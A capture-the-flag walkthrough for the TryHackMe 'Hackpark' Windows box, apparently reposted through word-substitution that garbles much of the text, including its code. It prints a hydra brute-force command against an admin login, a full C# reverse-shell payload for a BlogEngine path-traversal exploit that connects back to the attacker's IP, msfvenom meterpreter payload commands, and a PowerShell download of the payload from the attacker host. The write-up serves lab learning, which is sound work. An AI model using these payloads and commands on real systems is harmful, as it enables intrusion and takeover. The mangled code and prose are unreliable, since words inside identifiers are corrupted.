Friday, February 3, 2023
HomePythonHow I Solved the Hackpark Walkthrough (TryHackMe) – Finxter

How I Solved the Hackpark Walkthrough (TryHackMe) – Finxter


CHALLENGE OVERVIEW

  • Hyperlink: hackpark
  • Issue: Medium
  • Goal: consumer and root flags on a home windows machine
  • Spotlight: utilizing metasploit to shortly and simply acquire root entry 
  • Instruments: nmap, dirb, hydra, burpsuite, msfvenom
  • Tags: RCE (distant code execution), Home windows

BACKGROUND

On this field, we’ll hack right into a home windows machine utilizing normal pen-testing instruments. There are two choices for fixing the field.

I’ll reveal on this submit how one can hack into the field with metasploit. Within the upcoming Hackpark Half II submit, I’ll present how one can discover the flags with out utilizing metasploit.

ATTACK MAP

IPs

First, let’s document our IP addresses in export format to make use of as bash variables.

export myIP=10.6.2.23
export targetIP=10.10.72.99

ENUMERATION

We’ll kick issues off with a dirb scan and an nmap scan.

/admin is found on targetIP with dirb.

┌─[kalisurfer@parrot]─[~]
└──╼ $nmap 10.10.208.243
Beginning Nmap 7.92 ( https://nmap.org ) at 2023-01-08 16:03 EST
Nmap scan report for 10.10.208.243
Host is up (0.098s latency).
Not proven: 998 filtered tcp ports (no-response)
PORT 	STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server

The ms-wbt-server appears to be like fascinating. A fast google search reveals that this port is used for home windows distant desktop. We could come again to this afterward within the hack.

PREPPING OUR COMMAND FOR HYDRA

Subsequent, we’ll use firefox in developer mode to examine the POST request once we try to login to the /admin portal with generic credentials (admin:cross).

__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0percent2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6percent2BrSLbrLQTpGUW7PNN9yu81percent2BCrpercent2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrwpercent2FHcpercent2FbHRLj78Vg3uIgS1tBETE8yApercent2FyhVkcxlv4S57ylx&__EVENTVALIDATION=KzdpR5igpercent2BeM9w8w06SCMiInTpqbnYjXVGpercent2BDsvem6bDWpercent2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8Upercent2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Qpercent2F0ofNG0percent2FXAWpg3L4ag2Jpercent2FxFs&ctl00percent24MainContentpercent24LoginUserpercent24UserName=consumer&ctl00percent24MainContentpercent24LoginUserpercent24Password=cross&ctl00percent24MainContentpercent24LoginUserpercent24LoginButton=Log+in__VIEWSTATE=Ik8Nvzb7OPvdGbKFiQG65vUd0percent2BKTMDTlsuaJHFI0n8AGY6ejY97f8BtzIPa7NQD6ojY6percent2BrSLbrLQTpGUW7PNN9yu81percent2BCrpercent2BzyoGnG5t7h21SlApufYlxqpTftAU7kTGIVDHtrwpercent2FHcpercent2FbHRLj78Vg3uIgS1tBETE8yApercent2FyhVkcxlv4S57ylx&__EVENTVALIDATION=KzdpR5igpercent2BeM9w8w06SCMiInTpqbnYjXVGpercent2BDsvem6bDWpercent2FszuOrIZ3bwrEZB4Ps4uxbPdetrkQk72MA02Zly2E8Upercent2FYGMss7sshnGSsNoB6bxRQVsMu7PvPvPWKMYgqIU4DNXIVP75lYFa9ROEIMvKVip1Qpercent2F0ofNG0percent2FXAWpg3L4ag2Jpercent2FxFs&ctl00percent24MainContentpercent24LoginUserpercent24UserName=consumer&ctl00percent24MainContentpercent24LoginUserpercent24Password=cross&ctl00percent24MainContentpercent24LoginUserpercent24LoginButton=Log+in

Subsequent, we’ll put together our command for hydra to make use of to brute-force our manner into the admin portal.

hydra -l admin -P /residence/kalisurfer/hacking-tools/rockyou.txt 10.10.72.99 http-post-form "/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdSpercent2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZepercent2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0percent2BrszOq1MNzhtok7qDPJpercent2FZf5IAVBDpercent2Fmt6iBA4TSBv7cqegTpercent2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4dpercent2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6btpercent2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZpercent2Fpercent2FA5fVpnOdEG3r6M5vBCXiCPZMX9Zpercent2Fpercent2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00percent24MainContentpercent24LoginUserpercent24UserName=admin&ctl00percent24MainContentpercent24LoginUserpercent24Password=^PASS^&ctl00percent24MainContentpercent24LoginUserpercent24LoginButton=Log+in:Login failed"
  • -l is for username
  • -P is for password wordlist 
  • http-post-form specifies the kind of TCP request
  • :Login failed (on the finish of the command) specifies the message response after a failed login try

Outcomes:

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please don't use in navy or secret service organizations, or for unlawful functions (that is non-binding, these *** ignore legal guidelines and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) beginning at 2023-01-08 18:02:09
[DATA] max 16 duties per 1 server, total 16 duties, 14344398 login tries (l:1/p:14344398), ~896525 tries per process
[DATA] attacking http-post-form://10.10.208.243:80/Account/login.aspx?ReturnURL=%2fadmin:__VIEWSTATE=AQWOT7qT89VUF9tqt9CcJxYj9HZaL2gEIdSpercent2F7EX6bVPPKSW75bNJUrkMtH5N7ca98BgUSI9lNnsYcwm3aaM37KLFLBXXfrIJxCZma36IBRRCWTCZepercent2BXoBJOFbJnGnQrGbrZEr6acimyj5ZwEGf0OAuAfc1xWkJ0percent2BrszOq1MNzhtok7qDPJpercent2FZf5IAVBDpercent2Fmt6iBA4TSBv7cqegTpercent2FppXiEqxwlcrI7XTwCbqAKYhdIDyM1QMY5TTAMFdbntYPdEDoR3x2ZK1mmM3TAS03J1Y4dpercent2BkOZWGvuEzbpD2FK8oRD7V9FxyizlIyxKK6egJMLHkF8wLekBf2kxBLX0l64Dbb68YbWyGVmNi6btpercent2BqH02JOxtv6pPXlY&__EVENTVALIDATION=E2cc8lwr7Dt6tUQcOjjl5fktG5y5DFErZpercent2Fpercent2FA5fVpnOdEG3r6M5vBCXiCPZMX9Zpercent2Fpercent2B3sFhi58t3fO73JqPN4XtBRJLOgWcMqZRv1vvAb7Up1ElProlDH2kPYAUjONCs76hrlMAsAdWSPId8TAgEByU6Ag3pmhDpmlWP6cNFkjswMWLxUIz&ctl00percent24MainContentpercent24LoginUserpercent24UserName=admin&ctl00percent24MainContentpercent24LoginUserpercent24Password=^PASS^&ctl00percent24MainContentpercent24LoginUserpercent24LoginButton=Log+in:Login failed
[STATUS] 663.00 tries/min, 663 tries in 00:01h, 14343735 to do in 360:35h, 16 energetic
[80][http-post-form] host: 10.10.208.243   login: admin   password: 1qaz2wsx
1 of 1 goal efficiently accomplished, 1 legitimate password discovered
Hydra (https://github.com/vanhauser-thc/thc-hydra) completed at 2023-01-08 18:03:43

INITIAL FOOTHOLD

Now we are able to log in with the consumer:password combo admin:1qaz2wsx

We’re proven an admin dashboard. Looking out up blogengine in exploits-db.com reveals a attainable exploit for us to make use of: (CVE-2019-6714).

To make use of the exploit, we have to add the exploit’s payload (PostView.ascx) via the file supervisor. We will then set off it by accessing the next deal with in our browser:

http://10.10.172.59/?theme=../../App_Data/information

And we should always then be capable to catch the revshell with a netcat listener.

PREPARE THE PAYLOAD

We have to change the IP and ports (in daring under) within the following payload, after which reserve it as PostView.ascx

payload:
<%@ Management Language="C#" AutoEventWireup="true" EnableViewState="false" Inherits="BlogEngine.Core.Net.Controls.PostViewBase" %>
<%@ Import Namespace="BlogEngine.Core" %>

<script runat="server">
	static System.IO.StreamWriter streamWriter;

    protected override void OnLoad(EventArgs e) {
   	 base.OnLoad(e);

	utilizing(System.Web.Sockets.TcpClient consumer = new System.Web.Sockets.TcpClient("10.6.2.23", 8888)) {
  	  utilizing(System.IO.Stream stream = consumer.GetStream()) {
  		  utilizing(System.IO.StreamReader rdr = new System.IO.StreamReader(stream)) {
  			  streamWriter = new System.IO.StreamWriter(stream);
  					 
  			  StringBuilder strInput = new StringBuilder();

  			  System.Diagnostics.Course of p = new System.Diagnostics.Course of();
  			  p.StartInfo.FileName = "cmd.exe";
  			  p.StartInfo.CreateNoWindow = true;
  			  p.StartInfo.UseShellExecute = false;
  			  p.StartInfo.RedirectStandardOutput = true;
  			  p.StartInfo.RedirectStandardInput = true;
  			  p.StartInfo.RedirectStandardError = true;
  			  p.OutputDataReceived += new System.Diagnostics.DataReceivedEventHandler(CmdOutputDataHandler);
  			  p.Begin();
  			  p.BeginOutputReadLine();

  			  whereas(true) {
  				  strInput.Append(rdr.ReadLine());
  				  p.StandardInput.WriteLine(strInput);
  				  strInput.Take away(0, strInput.Size);
  			  }
  		  }
  	  }
  	  }
    }

    non-public static void CmdOutputDataHandler(object sendingProcess, System.Diagnostics.DataReceivedEventArgs outLine) {
       StringBuilder strOutput = new StringBuilder();

     	  if (!String.IsNullOrEmpty(outLine.Knowledge)) {
     		  attempt {
      			  strOutput.Append(outLine.Knowledge);
          			  streamWriter.WriteLine(strOutput);
          			  streamWriter.Flush();
       		 } catch (Exception err) { }
   	 }
    }

</script>
<asp:PlaceHolder ID="phContent" runat="server" EnableViewState="false"></asp:PlaceHolder>

SET UP THE NC LISTENER

Subsequent, let’s spin up a netcat listener with the command:

nc -lnvp 8888

TRIGGER THE REV SHELL

Now that our malicious payload is uploaded and our netcat listener is activated, all we now have to do is navigate to the next deal with, and we should always catch the reverse shell as deliberate. 

http://10.10.172.59/?theme=../../App_Data/information

And … bingo! We’ve caught the revshell and we’re in with our preliminary foothold!

UPGRADE THE SHELL TO METERPRETER

Now that we’re within the shell, we are able to work to improve our shell to a meterpreter shell. This may permit us to make use of many highly effective instruments inside metasploit framework.

We’ll use python3 to spin up a easy HTTP server that may assist us serve the reverse meterpreter shell payload file to the home windows machine. 

USE MSFVENOM TO CREATE REVSHELL PAYLOAD

The next command will create the payload:

msfvenom -p home windows/meterpreter/reverse_tcp LHOST=10.6.2.23 LPORT=8888 -f exe -o payload.exe

The payload didn’t work on my machine, so I added encoding utilizing an ordinary encoder, the “shikata gai nai”. 

msfvenom -p home windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.6.2.23 LPORT=9999 -f exe -o payload.exe

TRANSFER THE MSFVENOM PAYLOAD TO TARGET

Subsequent, we’ll switch the encoded payload from our assault machine to the goal machine. 

Let’s navigate to the listing that holds the payload.exe on our assault machine. Then we’ll spin up a easy HTTP server utilizing the command:

Python3 -m http.server

Then we’ll seize the file and replica it to our goal Home windows machine from the HTTP server:

powershell -c "Invoke-WebRequest -Uri 'http://10.6.2.23:8000/payload.exe' -OutFile 'C:WindowsTempwinPEASx64.exe'"

Discover that we save the file within the Temp listing as a result of we now have to write down permissions there. This can be a widespread configuration that may be leveraged as an unprivileged consumer.

CATCH THE METERPRETER SHELL WITH METASPLOIT

First, let’s fireplace up Metasploit console:

msfconsole

Then load the handler:

use exploit/multi/handler

Subsequent, we have to set the lport, lhost, and set the payload to home windows/meterpreter/reverse_tcp

Now that the whole lot is about up accurately, we are able to run it besides up the meterpreter listener:

Run

activate the shell.exe on the goal machine to throw a meterpreter revshell

And we received it! The decrease left console window reveals the meterpreter shell.

Now that we’re working a meterpreter shell in msfconsole we are able to shortly pwn the system with:

getsystem

And think about the system data:

sysinfo

We will view our consumer data with the command:

getuid

Since we’re already NT Authority, due to the magical powers of Metasploit, we don’t have to do the rest besides find and retrieve the 2 flags.

We discovered each flags!

Within the subsequent submit, I’ll stroll you thru an alternate answer to this field while not having Metasploit.

RELATED ARTICLES

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Most Popular

Recent Comments